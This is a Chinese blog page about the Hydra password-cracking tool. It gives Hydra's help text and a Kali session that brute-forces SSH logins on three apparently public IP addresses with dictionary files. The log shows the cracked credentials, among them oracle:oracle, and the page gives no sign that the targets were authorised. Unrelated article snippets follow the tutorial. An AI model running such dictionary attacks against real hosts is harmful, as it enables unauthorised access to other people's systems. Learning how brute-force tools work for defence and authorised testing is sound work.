安全工具-Hydra
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
# 待破解的主机列表
root@kali:~# cat serverlist
189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c) by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have seconds to abort...
[DATA] max tasks per servers, overall tasks, login tries (l:/p:), ~ tries per task
[DATA] attacking service ssh on port
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[][ssh] host:189.37.178.98 login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - of [child ]
[][ssh] host:189.37.178.1 login: pentest password:
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - of [child ]
[][ssh] host:189.37.178.216 login: oracle password: oracle
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
of targets successfully completed, valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表 root@kali:~# cat output.txt
# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh)
[][ssh] host: 189.37.178.98 login: root
[][ssh] host: 189.37.178.1 login: pentest password:
[][ssh] host: 189.37.178.216 login: oracle password: oracle
安全工具-Hydra的更多相关文章
- 路由器密码破解工具 Hydra 7.5
之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...
- Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用
Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...
- 暴力破解工具hydra与Medusa
---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...
- (总结)Linux下的暴力密码在线破解工具Hydra详解
(总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869
- 初试在线破解工具Hydra爆破3389服务器
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...
- Linux下暴力破解工具Hydra详解
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- [转]Linux下的暴力密码破解工具Hydra详解
摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...
- linux下暴力破解工具hydra【转】
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- linux暴力密码破解工具hydra安装与使用
说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...
- Kali中密码暴力破解工具hydra的使用
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...
随机推荐
- Ubuntu12.04系统复制速度奇慢的原因猜想
一开始到实验室,开始使用这些机器时候就是安装好的win+Ubuntu 12.04双系统,开始因为就自己用,而且文件传输并不是很多,复制的问题并没有凸显出来, 去年下半年开始,往服务器上传或下载大批量文 ...
- GCD 与 LCM UVA - 11388
题目链接: https://cn.vjudge.net/problem/23709/origin 本题其实有坑 数据大小太大, 2的32次方,故而一定是取巧的算法,暴力不可能过的 思路是最大公因数的倍 ...
- MySql基础笔记(一)Mysql快速入门
Mysql快速入门 一)基本概念 1)表 行被称为记录,是组织数据的单位.列被称为字段,每一列表示记录的一个属性. 2)主键 主键用于唯一的标识表中的每一条记录.可以定义表中的一列或者多列为主键, 但 ...
- [CF49E]Common ancestor
[CF49E]Common ancestor 题目大意: 有两个由小写字母构成的字符串\(S\)和\(T(|S|,|T|\le50)\).另有\(n(n\le50)\)个形如\(a\to bc\)的信 ...
- mongodb副本集出现的错误 mongodb error: { MongoNetworkError: failed to connect to server [127.0.0.1:1010] on first connect [MongoNetworkError: connect ECONNREFUSED 127.0.0.1:1010]
replset = pictureWorks 执行:mongo --port 1008 (查看1008是否是住数据库) rs.status() 执行: onfig={"_id": ...
- [BZOJ1814]Formula 1
Description: 一个 m * n 的棋盘,有的格子存在障碍,求经过所有非障碍格子的哈密顿回路个数 Hint: \(n,m<=12\) Solution: 插头dp模板题,注意要讨论多种 ...
- [计算机视觉]掩膜(mask)
转自->这里 刚开始涉及到图像处理的时候,在OpenCV等库中总会看到mask这么一个参数,非常的不理解,在查询一系列资料之后,写下它们,以供翻阅. 什么是掩膜(mask) 数字图像处理中的掩膜 ...
- h5本地缓存(localStorage,sessionStorage)
H5本地存储数据 localStorage,sessionStorage的区别: 相同点: 缓存数据比cookie的范围大; localStorage:关闭浏览器数据不会消失,除非手动删除数据 se ...
- Java几种常见的编码方式
几种常见的编码格式 为什么要编码 不知道大家有没有想过一个问题,那就是为什么要编码?我们能不能不编码?要回答这个问题必须要回到计算机是如何表示我们人类能够理解的符号的,这些符号也就是我们人类使用的语言 ...
- servlet 表单加上multipart/form-data后request.getParameter获取NULL(已解决)
先上结论(可能不对,因为这是根据实践猜测而来,欢迎指正) 表单改为multipart/form-data传值后,数据就不能通过普通的request.getParameter获取. 文件和文件名通过Fi ...